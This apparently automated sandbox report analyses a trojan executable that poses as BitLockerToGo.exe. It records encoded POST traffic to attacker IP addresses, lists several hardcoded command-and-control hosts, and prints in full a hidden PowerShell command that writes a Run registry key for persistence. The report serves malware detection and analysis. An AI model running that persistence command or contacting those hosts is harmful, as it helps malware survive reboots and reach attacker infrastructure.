      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 46.8.232.106User-Agent: Go-http-client/1.1Content-Length: 162X-Api-Key: oFbfsa5fAccept-Encoding: gzipData Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
      Source: BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C098000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243
      Source: BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C098000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243http://46.8.232.106
      Source: BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C098000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106
      Source: BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61
      Source: BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91
      Source: BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://93.185.159.253
      Source: powershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000004.00000002.1577671729.0000000004736000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1576982085.0000000002509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000004.00000002.1577671729.00000000045E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000004.00000002.1577671729.0000000004736000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1576982085.0000000002509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000004.00000002.1577671729.00000000045E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000004.00000002.1577671729.0000000004736000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1576982085.0000000002509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: BwqqVoHR71.exeString found in binary or memory: https://picsum.photos/208/500
      Source: BwqqVoHR71.exeString found in binary or memory: https://picsum.photos/500/500%02x:%02x:%02x:%02x:%02x:%02x
      Source: BwqqVoHR71.exe, 00000000.00000000.1294863866.000000000051E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: directInput8Creatememstr_e20c21ac-f
      Source: BwqqVoHR71.exe, 00000000.00000000.1294863866.000000000051E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: DwmGetColorizationColorDwmIsCompositionEnabledSetThreadExecutionStateRegisterRawInputDevicesglfw: invalid shape: %dunexpected operator: %sredeclared function: %sinvalid length of arrayinvalid length array %d%v is not a valid token0123456789abcdefABCDEF_function %q not definedmissing protocol schemeinvalid URI for requestflate: internal error: too many pointers (>10)segment length too longunpacking Question.Nameunpacking Question.Typeskipping Question Classunknown character widthwhile scanning an aliaspattern bits too long: missing type constraintunbalanced label scopesobject already resolvedmissing required key %sinvalid unicode literalunsupported encoding %vproperties: Line %d: %scircular reference in:memstr_983a9040-8
      Source: BwqqVoHR71.exeStatic PE information: invalid certificate
      Source: BwqqVoHR71.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: BwqqVoHR71.exe, 00000000.00000002.1471460076.00000000024BA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs BwqqVoHR71.exe
      Source: BwqqVoHR71.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: BwqqVoHR71.exe, 00000000.00000002.1471460076.000000000251E000.00000004.00001000.00020000.00000000.sdmp, BwqqVoHR71.exe, 00000000.00000002.1471460076.0000000004323000.00000004.00001000.00020000.00000000.sdmp, BwqqVoHR71.exe, 00000000.00000002.1471460076.0000000003508000.00000004.00001000.00020000.00000000.sdmp, BwqqVoHR71.exe, 00000000.00000002.1471460076.0000000004906000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3157476707.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .vbpb
      Source: classification engineClassification label: mal72.troj.evad.winEXE@7/4@0/6
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\configJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_03
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ilc5z5z.rdx.ps1Jump to behavior
      Source: BwqqVoHR71.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: BwqqVoHR71.exeReversingLabs: Detection: 28%
      Source: BwqqVoHR71.exeString found in binary or memory: , locked to threadruntime.semacreateruntime.semawakeupunexpected newlinevalue out of range298023223876953125Nashville-DavidsonDominican RepublicKorea, Republic ofRussian FederationFyodor DogstoevskyPrince of BarknessAmerican ShorthairEuropean ShorthairOriental ShorthairScottish DeerhoundNorwegian ElkhoundMiniature PinscherAustralian TerrierBedlington TerrierPatterdale TerrierDouble Bastard AleOrval Trappist Ale1098 - British Ale5733 - PediococcusBelgian Strong AleGulliver's TravelsMemoirs of HadrianPippi LongstockingCrossfire RoadsterGrand Cherokee 2wdGrand Cherokee 4wdTown & Country 2wdE150 Econoline 2wdFreestar Wagon FwdMonterey Wagon FwdTaurus Ethanol FfvC1500 Suburban 2wdX-type Sport BrakeL-140/715 GallardoClk350 (cabriolet)F150 Supercrew 4wdSylvester StalloneScarlett JohanssonMadam C. J. WalkerMarco Pierre WhiteArianna HuffingtonSir Donald BradmanMichael SchumacherSir Steve RedgraveHicham El GuerroujBerkshire HathawayCastle BiosciencesDocket Alarm, Inc.Forrester ResearchHarris CorporationHealthPocket, Inc.iFactor ConsultingInfoCommerce GroupMarinexplore, Inc.National Van LinesThe Vanguard GroupUrban Mapping, IncWay Better PatentsFully-configurableReverse-engineeredcontextually-basedlocal area networkMauritania OuguiyaMozambique MeticalNew Zealand DollarSaudi Arabia RiyalSaint Helena PoundSierra Leone LeoneTurkmenistan ManatYekaterinburg Time(UTC-10:00) Hawaii(UTC-09:00) Alaska(UTC-04:00) Cuiaba(UTC-01:00) Azores(UTC+02:00) Beirut(UTC+03:30) Tehran(UTC+06:00) Astana(UTC+08:00) Taipei(UTC+09:30) Darwin(UTC+10:00) HobartAfrica/Addis_AbabaAfrica/BrazzavilleAfrica/OuagadougouAmerica/Costa_RicaAmerica/Fort_WayneAmerica/Grand_TurkAmerica/GuadeloupeAmerica/HermosilloAmerica/KralendijkAmerica/LouisvilleAmerica/MartiniqueAmerica/MetlakatlaAmerica/MontevideoAmerica/MontserratAmerica/ParamariboAmerica/Porto_AcreAmerica/Rio_BrancoAmerica/St_VincentAmerica/WhitehorseAntarctica/McMurdoAntarctica/RotheraAsia/SrednekolymskAsia/Ujung_PandangAsia/YekaterinburgAtlantic/Jan_MayenAtlantic/ReykjavikAtlantic/St_HelenaAustralia/AdelaideAustralia/BrisbaneAustralia/CanberraAustralia/LindemanEurope/Isle_of_ManEurope/KaliningradPacific/Kiritimati
      Source: BwqqVoHR71.exeString found in binary or memory: buttonraised_hand_with_fingers_splayedapplication/x-pkcs7-certificatesapplication/vnd.ms-pki.certstorenats cucumber cream cheese bagelawesome orange chocolate muffinstuna red onion and parsley saladtomato cucumber avocado sandwichsimple pan fried chicken breastsroasted potatoes and green beansgolden five spice sticky chickenroasted cherry or grape tomatoescrushed red potatoes with garlicoriental asparagus and mushroomschocolate macadamia nut browniescream cheese walnut drop cookiesangelic strawberry frozen yogurtfew sandwiches short of a picnicmonkeys might fly out of my buttplease excuse my dear Aunt Sallybefore you can say Jack Robinsonin literal false (expecting 'a')in literal false (expecting 'l')in literal false (expecting 's')in literal false (expecting 'e')reflect: NumIn of non-func type reflect.MapOf: invalid key type MapIter.Value called before Nextreflect.Value.Grow: negative lentotal sampling factors too largeunescaped < inside quoted stringbootstrap type already present: x509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failurex509: unknown SignatureAlgorithminteger is not minimally encodedcannot represent time as UTCTimeber2der: BER tag length too longpkcs7: No certificate for signerbufio: invalid use of UnreadBytebufio: invalid use of UnreadRunebufio: tried to fill full buffermime: expected token after slashgo package net: hostLookupOrder(use of closed network connectionGetVolumePathNamesForVolumeNameWreflect: NumOut of non-func type" not supported for cpu option "glfw: CreateWindowExW failed: %wglfw: GetRawInputData failed: %wglfw: TrackMouseEvent failed: %wthe requested API is unavailabletoo many arguments in call to %sconstant %s truncated to integerinit function is not implementedinvalid arguments for bool: (%s)invalid arguments for vec2: (%s)invalid arguments for vec3: (%s)invalid arguments for vec4: (%s)invalid arguments for mat2: (%s)invalid arguments for mat3: (%s)invalid arguments for mat4: (%s)UnknownBoolStringIntFloatComplexinvalid size %d (should be >= 0)expected end of string, found %qmalformed character constant: %scrypto/ecdh: invalid private keyed25519: bad public key length: crypto/des: input not full blockunexpected character, want colonwhile parsing a block collectiondid not find expected ',' or ']'did not find expected ',' or '}'found incompatible YAML documentincomplete UTF-16 surrogate pairwhile scanning a %YAML directivedid not find expected whitespacemultiple ,inline maps in struct nil type in named parameter listreadPythonMultilines: parsing %qValue %d for key %s out of rangedate time should have a timezonecouldn't parse binary number: %winput overflows the modulus sizeexpected: IDENT | STRING got: %sunimplemented Value for type: %sbasic string not terminated by "unexpected null character (0x00)Specific brand or variety of beerThe specific name given to a bookA problem with a web http requestHex or RGB arr
      Source: BwqqVoHR71.exeString found in binary or memory: buttonraised_hand_with_fingers_splayedapplication/x-pkcs7-certificatesapplication/vnd.ms-pki.certstorenats cucumber cream cheese bagelawesome orange chocolate muffinstuna red onion and parsley saladtomato cucumber avocado sandwichsimple pan fried chicken breastsroasted potatoes and green beansgolden five spice sticky chickenroasted cherry or grape tomatoescrushed red potatoes with garlicoriental asparagus and mushroomschocolate macadamia nut browniescream cheese walnut drop cookiesangelic strawberry frozen yogurtfew sandwiches short of a picnicmonkeys might fly out of my buttplease excuse my dear Aunt Sallybefore you can say Jack Robinsonin literal false (expecting 'a')in literal false (expecting 'l')in literal false (expecting 's')in literal false (expecting 'e')reflect: NumIn of non-func type reflect.MapOf: invalid key type MapIter.Value called before Nextreflect.Value.Grow: negative lentotal sampling factors too largeunescaped < inside quoted stringbootstrap type already present: x509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failurex509: unknown SignatureAlgorithminteger is not minimally encodedcannot represent time as UTCTimeber2der: BER tag length too longpkcs7: No certificate for signerbufio: invalid use of UnreadBytebufio: invalid use of UnreadRunebufio: tried to fill full buffermime: expected token after slashgo package net: hostLookupOrder(use of closed network connectionGetVolumePathNamesForVolumeNameWreflect: NumOut of non-func type" not supported for cpu option "glfw: CreateWindowExW failed: %wglfw: GetRawInputData failed: %wglfw: TrackMouseEvent failed: %wthe requested API is unavailabletoo many arguments in call to %sconstant %s truncated to integerinit function is not implementedinvalid arguments for bool: (%s)invalid arguments for vec2: (%s)invalid arguments for vec3: (%s)invalid arguments for vec4: (%s)invalid arguments for mat2: (%s)invalid arguments for mat3: (%s)invalid arguments for mat4: (%s)UnknownBoolStringIntFloatComplexinvalid size %d (should be >= 0)expected end of string, found %qmalformed character constant: %scrypto/ecdh: invalid private keyed25519: bad public key length: crypto/des: input not full blockunexpected character, want colonwhile parsing a block collectiondid not find expected ',' or ']'did not find expected ',' or '}'found incompatible YAML documentincomplete UTF-16 surrogate pairwhile scanning a %YAML directivedid not find expected whitespacemultiple ,inline maps in struct nil type in named parameter listreadPythonMultilines: parsing %qValue %d for key %s out of rangedate time should have a timezonecouldn't parse binary number: %winput overflows the modulus sizeexpected: IDENT | STRING got: %sunimplemented Value for type: %sbasic string not terminated by "unexpected null character (0x00)Specific brand or variety of beerThe specific name given to a bookA problem with a web http requestHex or RGB arr
      Source: BwqqVoHR71.exeString found in binary or memory: x509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesssuperfluous leading zeros in lengthexecutable file not found in %PATH%ber2der: BER tag length is negativegzip: invalid compression level: %dgzip.Write: Extra data is too largemime: bogus characters after %%: %qSubscribeServiceChangeNotificationsfile type does not support deadlinezlib: invalid compression level: %dglfw: AdjustWindowRectEx failed: %wglfw: CreateIconIndirect failed: %wglfw: GetModuleHandleExW failed: %wthe GLFW library is not initializedinvalid argument for enum parameterthe requested format is unavailablethe specified window has no contextglfw: invalid input mode 0x%08X: %wglfw: invalid window size %dx%d: %wglfw: invalid window opacity %f: %wopengl: unexpected attribute layoutno new variables on left side of :='_' must separate successive digitshash/crc32: invalid hash state sizerange can only initialize variablestransform: short destination bufferbigmod: modulus is smaller than natflate: corrupt input before offset too many Questions to pack (>65535)must set the input source only oncedid not find expected '-' indicatorfound extremely long version numberfound unexpected document indicatormethod must have no type parameters%s: unknown kind to decode into: %s%s: not an object type for map (%T)nanoseconds need at least one digitnumber cannot start with underscoretoml: cannot encode a nil interfaceshould not be called with empty keynumber %f does not fit in a float32P224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitybasic strings cannot have new linesunimplemented HCLToken for type: %sTime.UnmarshalBinary: invalid lengthAffectionate nickname given to a petAnimal name commonly found on a farmMeasures the alcohol content in beerABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789Blueberry banana happy face pancakes590c1440-9888-45b0-bd51-a817ee07c3f2?????@??????.com => billy@mister.comInterpret context record river mind.Cannot set children on terminal nodeThunk Address Of Data too spread outPower PC with floating point supportCherokee United States (chr-Cher-US)Chinese (Traditional) Taiwan (zh-TW)English United Arab Emirates (en-AE)locale not found when calling %s: %vcrypto/cipher: input not full blocksbytes: Repeat output length overflowbytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionaccessing a corrupted shared libraryfailure to read data directories: %vfail to read section relocations: %vfail to read string table length: %vstrings.Builder.Grow: negative countstrings: Join output length overflowlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closi
      Source: BwqqVoHR71.exeString found in binary or memory: x509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesssuperfluous leading zeros in lengthexecutable file not found in %PATH%ber2der: BER tag length is negativegzip: invalid compression level: %dgzip.Write: Extra data is too largemime: bogus characters after %%: %qSubscribeServiceChangeNotificationsfile type does not support deadlinezlib: invalid compression level: %dglfw: AdjustWindowRectEx failed: %wglfw: CreateIconIndirect failed: %wglfw: GetModuleHandleExW failed: %wthe GLFW library is not initializedinvalid argument for enum parameterthe requested format is unavailablethe specified window has no contextglfw: invalid input mode 0x%08X: %wglfw: invalid window size %dx%d: %wglfw: invalid window opacity %f: %wopengl: unexpected attribute layoutno new variables on left side of :='_' must separate successive digitshash/crc32: invalid hash state sizerange can only initialize variablestransform: short destination bufferbigmod: modulus is smaller than natflate: corrupt input before offset too many Questions to pack (>65535)must set the input source only oncedid not find expected '-' indicatorfound extremely long version numberfound unexpected document indicatormethod must have no type parameters%s: unknown kind to decode into: %s%s: not an object type for map (%T)nanoseconds need at least one digitnumber cannot start with underscoretoml: cannot encode a nil interfaceshould not be called with empty keynumber %f does not fit in a float32P224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitybasic strings cannot have new linesunimplemented HCLToken for type: %sTime.UnmarshalBinary: invalid lengthAffectionate nickname given to a petAnimal name commonly found on a farmMeasures the alcohol content in beerABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789Blueberry banana happy face pancakes590c1440-9888-45b0-bd51-a817ee07c3f2?????@??????.com => billy@mister.comInterpret context record river mind.Cannot set children on terminal nodeThunk Address Of Data too spread outPower PC with floating point supportCherokee United States (chr-Cher-US)Chinese (Traditional) Taiwan (zh-TW)English United Arab Emirates (en-AE)locale not found when calling %s: %vcrypto/cipher: input not full blocksbytes: Repeat output length overflowbytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionaccessing a corrupted shared libraryfailure to read data directories: %vfail to read section relocations: %vfail to read string table length: %vstrings.Builder.Grow: negative countstrings: Join output length overflowlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closi
      Source: BwqqVoHR71.exeString found in binary or memory: buttonflag: British Indian Ocean Territorysouth_georgia_south_sandwich_islandsfailed to {hackerverb} {errorobject}variable assigned before declarationapplication/x-vnd.audioexplosion.mzzmelt in your mouth blueberry muffinssausage gravy for biscuits and gravyblueberry banana happy face pancakesbaby greens with mustard vinaigrettedon t burn your fingers garlic breadsalata marouli romaine lettuce saladlindas chunky garlic mashed potatoespan broiled steak with whiskey sauceyou kiss your mother with that mouthstick that in your pipe and smoke itjson: encoding error for type %q: %qmethod ABI and value ABI don't alignreflect.Value.Equal: values of type exceeded maximum template depth (%v)%s is not a method but has argumentswrong number of args: got %d want %dinternal error: associate not commonhttp://www.w3.org/XML/1998/namespacexml: end tag </%s> without start tagxml: %s chain not valid with %s flagx509: zero or negative DSA parameterx509: invalid CRL distribution pointx509: invalid subject key identifierx509: malformed algorithm identifierIA5String contains invalid characterinvalid boolean value %q for -%s: %vreflect: NumField of non-struct typeglfw: EnumDisplayMonitors failed: %wglfw: invalid cursor mode 0x%08X: %wglobal variables must be exposed: %sunexpected count of types in lhs: %dinvalid number of arguments for vec2invalid number of arguments for vec3invalid number of arguments for vec4invalid number of arguments for mat2invalid number of arguments for mat3invalid number of arguments for mat4multiplication of zero with infinityinvalid semicolon separator in queryno assembly implementation availablecrypto/sha1: invalid hash state sizecrypto/sha512: invalid hash functioncompressed name in SRV resource datamust set the output target only onceunknown problem parsing YAML contentdocument contains excessive aliasingdid not find expected <stream-start>did not find expected version numberinvalid pattern syntax (+ after -): %s: cannot decode into interface: %Ttoml: cannot encode value of type %sedwards25519: invalid point encodingrange length is larger than capacityinvalid characters in heredoc anchortimezone hour outside of range [0,23]invalid type, must be array or object%s field could not parse to int valueDelimited separated unsigned integersWhether or not to have gaps in numberDay of the week excluding the weekendString Representation of a month nameReportAttemptingFullContext decision=French Principality Of Monaco (fr-MC)Inuktitut (Latin) Canada (iu-Latn-CA)Mongolian (Cyrillic) Mongolia (mn-MN)Uzbek (Latin) Uzbekistan (uz-Latn-UZ)Yi People's Republic Of China (ii-CN)` VirtualAddress is beyond 0x10000000cipher: message authentication failedcrypto/cipher: invalid buffer overlapcrypto/cipher: incorrect GCM tag sizebytes.Buffer: truncation out of rangecannot exec a shared library directlyvalue too large for defined data typetoo many symbols; file may be corruptruntime: allocation size out of range) is smaller than minimum page size (/cpu/classes/gc/ma
      Source: BwqqVoHR71.exeString found in binary or memory: span set block with unpopped elements found in resetruntime: GetQueuedCompletionStatusEx failed (errno= casfrom_Gscanstatus: gp->status is not in scan stategamepad: IDirectInputDevice8::EnumObjects failed: %wgamepad: IDirectInputDevice8::GetProperty failed: %wgamepad: IDirectInputDevice8::SetProperty failed: %wUnited Kingdom of Great Britain and Northern Irelandscrambled egg sandwiches with onions and red peppersbaked ham glazed with pineapple and chipotle pepperswrong number of args for %s: want at least %d got %dxml: EncodeElement of StartElement with missing namex509: cannot verify signature: insecure algorithm %vpkcs7: cannot parse data: unimplemented content typepkcs7: encryption algorithm parameters are incorrectpkcs7: encryption algorithm parameters are malformedConvertSecurityDescriptorToStringSecurityDescriptorWConvertStringSecurityDescriptorToSecurityDescriptorWglfw: invalid parameter at Monitor.setVideoModeWin32math/big: cannot unmarshal %q into a *big.Float (%v)crypto/rsa: PSSOptions.SaltLength cannot be negativeinternal error: missing handler for resolver table: unexpected character 'i' while scanning for a numberunexpected character 'n' while scanning for a numberFirst meal of the day, typically eaten in the morningFixed width rows of output data based on input fields<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 Adverb that specifies the exact time an action occursAdverb that gives a general or unspecified time framePronoun referring back to the subject of the sentenceStatement formulated to inquire or seek clarificationCentral Atlas Tamazight (Arabic) Morocco (tzm-ArabMA)non-concurrent sweep failed to drain all sweep queuescompileCallback: argument size is larger than uintptrsync/atomic: compare and swap of nil value into Valuegraphics: fragment shader entry point '%s' is missingapplication/x-nokia-9000-communicator-add-on-softwarekittencals banana almond muffins with almond streuselreflect: non-interface type passed to Type.Implementsreflect.Value.Slice: string slice index out of boundsxml: %s.MarshalXML wrote invalid XML: <%s> not closedx509: certificate specifies an incompatible key usagebufio.Scan: too many empty tokens without progressingpacking: maxSize must be a positive power of 2 but %dshader: at most one //kage:unit can exist in a shadercannot use type %s as type %s in variable declarationmath/big: internal error: cannot find (D/n) = -1 for crypto/ecdh: internal error: mismatched isLess inputscrypto/elliptic: attempted operation on invalid point^[-+]?(\.[0-9]+|[0-9]+(\.[0-9]*)?)([eE][-+]?[0-9]+)?$did not find expected alphabetic or numeric characterType of animal, such as mammals, birds, reptiles, etc.Person or group creating and developing an applicationScale indicating the concentration of extract in wortsSix-digit code representing a color in the color modelDesignated official name of a business or organizationcall to Fake method did not return an unsigned integerWord that modifies verbs, adjectives, or other ad
      Source: BwqqVoHR71.exeString found in binary or memory: net/addrselect.go
      Source: BwqqVoHR71.exeString found in binary or memory: github.com/brianvoe/gofakeit/v6@v6.28.0/data/address.go
      Source: BwqqVoHR71.exeString found in binary or memory: github.com/brianvoe/gofakeit/v6@v6.28.0/address.go
      Source: BwqqVoHR71.exeString found in binary or memory: github.com/magiconair/properties@v1.8.6/load.go
      Source: BwqqVoHR71.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
      Source: unknownProcess created: C:\Users\user\Desktop\BwqqVoHR71.exe "C:\Users\user\Desktop\BwqqVoHR71.exe"
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"Jump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeSection loaded: d3dcompiler_47.dllJump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\BwqqVoHR71.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
